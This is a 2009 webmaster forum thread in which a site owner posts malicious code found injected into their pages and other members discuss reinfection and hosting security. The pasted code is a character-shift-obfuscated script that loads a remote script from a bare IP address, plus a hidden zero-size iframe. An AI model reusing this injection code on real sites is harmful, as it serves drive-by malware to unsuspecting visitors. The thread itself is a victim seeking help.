Forum Moderators: phranque
I recently got nailed by Google on some of my sites. They categorized my sites as "malware." Bizarre to say the least. I have been operating these sites for almost ten years. Anyway, I found a strange piece of code at the bottom of one of my pages:
<!-- ad --><html><script>
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
</script></html><!-- /ad --><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://example.com/trf.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->I have no idea how this happened. Has anyone had this happen to them? HOW can this get on there? I want to prevent this kind of thing from happening in the future.
[edited by: engine at 7:34 pm (utc) on April 24, 2009]
[edit reason] examplified [/edit]
Both sites are on the same server located in the u.k.
Have now changed the passwords.
Regards
Neil
I also had the same thing,
i deleted the codes and after 2 days it was up again on the index.php and login.php file on my site,
does anyone know what this is?
That sort of attack is getting much more common; wordpress and other similar products have been targeted several times.
There's a lot of advice in previous threads. You need to go beyond cleaning out the code and changing the passwords. There is some fundamental loophole that the miscreants are taking advantage of.
Regards Neil
If shared hosting, move to another hosting company. With shared hosting you have only limited possibilities to close such holes and with shared hosting many times the problem is caused by the hosting provider rather then the website operator.
Regards Neil
